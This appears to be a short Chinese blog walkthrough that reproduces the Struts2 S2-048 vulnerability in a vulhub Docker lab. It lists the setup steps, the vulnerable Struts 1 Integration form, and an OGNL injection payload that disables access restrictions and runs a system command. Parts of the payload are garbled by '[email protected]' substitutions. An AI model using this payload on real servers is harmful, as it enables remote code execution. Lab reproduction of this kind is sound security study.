struts2 s2-048漏洞复现

我在docker中搭得的vulhub靶场
1.开启环境
命令
开启docker :service docker start
启动环境 :docker-compose up -d
2.环境启动好后访问http://your-ip:8080/showcase/
struts2 s2-048漏洞复现_第1张图片
3.这个漏洞在integraton下的struts1处
struts2 s2-048漏洞复现_第2张图片
4.访问Integration/Struts 1 Integration:

struts2 s2-048漏洞复现_第3张图片
5.触发OGNL表达式的位置是Gangster Name这个表单,在此处填写poc即可
poc:%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream())).(#q)}
struts2 s2-048漏洞复现_第4张图片

你可能感兴趣的:(漏洞复现)